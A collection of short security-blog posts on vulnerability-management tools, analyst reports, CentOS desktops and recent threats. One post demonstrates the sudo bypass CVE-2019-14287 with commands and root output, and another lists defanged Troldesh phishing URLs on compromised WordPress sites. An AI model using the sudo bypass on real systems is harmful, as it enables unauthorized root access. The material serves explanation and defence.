Pretty nice GUI feature in the latest #Nessus Professional 8.7.0. Now you can select a host or hosts in the scan results and create a new scan based on a different Scan Template/Policy. For example, you can perform a fast discovery scan, filter some hosts and then scan them deeply with authentication. Other features of this release are about Nessus Manager and Essentials, so not very interesting for me. 🙂 #Tenable

Features in the GUI are certainly pleasant, but the real game changer in Vulnerability Management, IMHO, will be automated patching for a reasonable price. It is much better when you do not just say that some systems are vulnerable but fix these problems with one click. At least most of them.

So, it's great that some VM vendors work on this. For example, 2 weeks ago #Qualys released a new 1.3 version of Patch Management module. It seems from the changes list that they understand: Windows patching is not only about the actual installation of the patches. It is also about:

- Catching the right time for patching. Now in Qualys you can choose "None" for Patch Window and install the emergency patch as soon as possible; patches can be also pre-downloaded before the job start to save some time.
- Changes in the registry and other reconfigurations.
- Reboots. Now in Qualys you can suppress reboot notification and reboot the host immediately after the patch deployment.

These are steps in the right direction.

The main thing that upsets me in #CentOS8 (that was finally released 4 days ago) is the lack of alternative desktop environments in repositories, even in EPEL. There is only a sloooow Gnome 3 with terrible junk animations that I REALLY hate. 😢

And now I am thinking what is better: to put up with Gnome (at least for a while) and patiently wait for my favourite #XFCE in EPEL (there is a request for this), to install XFCE from the source (it seems difficult) or try to install some other minimalistic DE from source... 🤔

I doubt that there are many people who use #CentOS as a Desktop OS, but if there are any, I would be happy to hear your opinion at https://t.iss.one/avleonovchat.

I just saw a nice post by #JSOC (in Russian) about the new version of #Troldesh cryptolocker cyberattack. This time attackers use legitimate but compromised #WordPress websites in phishing.

The links look pretty normal:

Horsesmouth[.]org/wp-content/themes/InspiredBits/images/dummy/doc/doc/

www.montessori-academy[.]org/wp-content/themes/campus/mythology-core/core-assets/images/social-icons/long-shadow/doc/

chestnutplacejp[.]com/wp-content/ai1wm-backups/doc/

Since these sites are legit and have a good reputation, it's quite difficult to detect and block emails with such links.

This is another good reason to update the vulnerable CMS as soon as possible, since the malware distribution can be even more dangerous for your business than the compromisation of the site itself.

#cryptolocker #phishing

Continuing the topic about the Qualys PM feature, I REALLY want to see the universal fully automated #PatchManagement (and therefore #VulnerabilityManagement), but I DON'T think we are close to that.

1. It is difficult to formalize all the steps that are necessary for patching. There are thousands of third-party software products (especially for Windows desktops). Even to get information about all the vulnerabilities in all these products is hard, getting the actionable and formal remediation instructions for them is even harder, and it's almost impossible to follow these instructions automatically and in a reliable way.

2. Patches sometimes break systems. It just happens. In a common human-driven process, there will always be a responsible person, who has not performed all necessary tests before actual patching and has not discussed the possible consequences with the system owner. In a fully automated process, you only have a PM product and the vendor who does not guarantee anything.

Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:

1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.

It seems a bit foolish to offer automated remediation for the systems where almost everything can be updated with a single command from #WSUS or Linux repository. However, in the case of Linux, there will be software installed from sources, self-built packages, and other complexities. And it's even without talking about #Docker. 🤯

So, it turns out that the most convenient for vendors is to focus on Windows desktops. And not for the all programs, but only for a specific list (clarify this to avoid surprises!).

Plus, the trigger and responsibility are still in the hands of IT administrators. 😉

Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.

Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people, who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy"-fighters? 😏

The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. 😕 At least, it is much better than to face such unfriendly unilateral actions unprepared and not to have any alternatives.

It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).

Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.

My reasons were as follows:

1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of Linux world. The only way to achieve this is to use such distribution every day.
3. I was tired of problems with the Virtual Box guest additions in #CentOS 7 (yes , I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it’s slow and ugly (however it’s fully functional!). And there were no other DEs in CentOS 8 repositories at that time.

Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/

A nice, but not very practical bug in #sudo CVE-2019-14287. Let's say I created a temp user:
# useradd temp
# passwd temp

And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id

Then I login as a temp user:
# su temp

I can run /usr/bin/id as temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)

I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.

BUT if I set a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's a bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)

^- we see that it was really executed as root with uid 0.

Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. This bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha! 😀

What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?

There are two main issues that each Vulnerability Scanning vendor faces:

1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside the big organization, where people can make integrations with various IT data source, it's not not so obvious what to scan! Of course, you can get some targets using known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important or/and add unrelated trash. Thus, there will be many false positives and false negatives in your report.

2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.

So, I'm standing for the homegrown solutions, that can be customized in different ways. 😉

BUT I am also for the constant comparisons with the commercial scanning services. Not because they will provide a better alternative (most likely not), but because they do the things independently and differently. The simple diff with their results can show whether your process is good enough: maybe some domains are managed on a different DNS server and you don't see them, maybe some target hosts have already banned your scanner and you don't see their services, maybe some host scans fail because of timeouts and various anti-scan measures, etc. Anything can happen!

When you have alternative results, it's much easier to evaluate the quality of your own system and make changes.

I just read the 14-page report, "Comparing vulnerability and security configuration assessment coverage of leading VM vendors" by Principled Technologies. Tenable marketing team actively shared it last week.

The main idea of the report: Tenable covers more CVEs and CIS benchmarks than Qualys and Rapid7.

So, my impressions:

1. Hallelujah! Finally, a comparison of Vulnerability Management products based on something measurable - on their Knowledge Bases. And at least one VM vendor is not afraid to use it in marketing and mentions the competitors directly. This is a huge step forward and I hope that this is the beginning of something more serious. We really need to start talking more about the core functionality of VM products.

2. However, this particular report is just a Tenable advertisement. This is not even hidden. I really like Nessus and Tenable, and believe that they have a very good Knowledge Base, but reading on every page how great Tenable's products are is just ridiculous. It would be much better to read it in more neutral form.

3. Using only the CVE IDs for comparing Vulnerability Knowledge Bases is NOT correct (strictly speaking), because for many software products most of vulnerabilities do not have CVEs, only the patch IDs. CVE-based comparison also doesn't distinguish types of vulnerability checks: remote banner-based, remote exploit-based and local. To make a reliable comparison, it's necessary to map all existing vulnerability detection plugins of VM products, but this is MUCH more difficult.

4. CVE-based comparison in this report is not really informative. They only compare absolute numbers of IDs grouping them by year, software product (cpe) and cvss v2 score. Why is this wrong? If VM vendor A covers 1000 CVEs and vendor B covers 1000 CVEs, this does not mean that they have the same database and it is quite complete. The real intersection between the KBs may be only 500 IDs, so these vendors would be able to detect only a half of each other's vulnerabilities. It matters, right? In my old express comparison of Nessus and OpenVAS Knowledge Bases I demonstrated this and tried to suggest reasons why some vulnerabilities are covered by some vendor and others are not. If you compare CVEs as sets of objects, it turns out that each VM product has own advantages and disadvantages.

5. CIS-based comparison in this report uses only information about certificated implementations from the CIS website without regard to versions and levels. CIS Certification is an expensive and complicated procedure, that is NOT mandatory and does not affect anything. I once implemented many CIS standards for Linux/Unix in PT Maxpatrol. Well, yes, they are not certified and you won't see them on the CIS website, but does this mean that they are not supported in the VM/CM product? Of course not! So, it's a very strange way of comparing Compliance Management capabilities.

In conclusion, the idea behind this report is good, but the implementation is rather disappointing. If one of the VM vendors, researchers or customers wants to make similar comparison, public or private, but in a much more reliable and fair way - contact me, I will be glad to take part in this. 😉

#PrincipledTechnologies #Tenable #Rapid7 #Qualys #CVE #CIS #VulnerabilityManagement #ComplianceManagement #CPE #CVSS #PositiveTechnologies #MaxPatrol #OpenVAS #Nessus

Yep, it's been a while since the last update. But I'm still working on Zbrunk and think this project is very important. It stuck a bit, but I hope to make small commits every evening. I also changed the priorities. Now I think it would be better not to integrate with Grafana, but to create own dashboards and GUI. And to begin with, I created a simple interface for Searching (and Deleting) events. #flask #vuejs #zbrunk

Q4 2019 Forrester Wave "Vulnerability Risk Management" with my arrows and old positions from the Q1 2018 report

It's becoming a good tradition to share my impressions about the Forrester Wave "Vulnerability Risk Management" report (here is one for Q1 2018). 😉 You can download a free reprint for Q4 2019 from Tenable website. This time I even edited the illustration a bit. I tried to show how the positions of vendors changed, which were added or removed. Please note that this is not official, it's just an extra layer that I added for fun.

What I liked:

The report has become much more adequate than last year. Traditional VM Big Three (Qualys, Tenable and Rapid7) are leaders. 👍🏻 Stagnant VM vendors have been pessimized or completely removed from the report. This is probably due to new and more adequate inclusion criteria: "product improvements over the last two years", "annual product revenue greater than $10 million", "VRM product was responsible for over 50% of their total revenue", "at least 100 enterprise customers", etc.

What I did NOT like (and this hasn't changed much since last year):

1. The main slogan of this report is "Prioritization And Reporting Are Key Differentiators". According to Forrester, Risk Prioritization is based on measuring vulnerabilities, assets and network segments. Well, I agree that Risk Prioritization is important. BUT (!) only when your Vulnerability Detection is perfect. This is clearly not the case at the moment! For proper Risk Prioritization it's necessary to understand the limitations of Vulnerability Scanners and how to obtain data for Asset and Network classification. Unfortunately, this report doesn't pay much attention to core functionality of VM products, it focuses on GUI, reports and high-level marketing features. The "vulnerability enumeration" is only 15% of overall weighting. It's really sad. 😔

2. Profile descriptions are based on marketing materials from vendors (BTW, such extract might be quite useful), and on some user quotes. These users also write about the reports and prioritization, like "custom reporting on individual business units was cumbersome" and "customers appreciate the new UI and strong reporting capabilities". It seems these users don't have (don't see/don't want to discuss) other problems.

3. Forrester mixes products that actually scan the network hosts with the products that only analyze imported data, perimeter-only services (why noto add over9000 ASV scanners than?) and scan services with "dedicated security specialist". The authors even write several times that some products "cannot be treated as a proper vulnerability management tool", so why do you include them in the report? 🤨

In any case, the report was better than last year. 🙂 I hope Forrester will make separate reports for the tools that actually detect vulnerabilities and tools that only aggregate&prioritize the vulnerabilities. It will also be great to change inclusion criteria and add smaller and more local VM vendors.

#Forrester #Brinqa #DigitalDefense #Expanse #KennaSecurity #NopSec #Outpost24 #Qualys #Rapid7 #RedSeal #RiskIQ #RiskSense #SkyboxSecurity #Tenable #BeyondSecurity #Tripwire #Symantec #BeyondTrust #IBM

Well, it's nice to recall this poll from May. 😉 It took ~ 6 months for #BlueKeep (CVE-2019-0708) to get a commercial exploit, then a free public exploit, and finally a first sample of malware that uses this vulnerability to deliver Monero cryptocurrency miner. Of course, this is not comparable to the WannaCry epidemics, and this malware seems to be successful in BSODing RDP honeypots mainly, but still. 🙂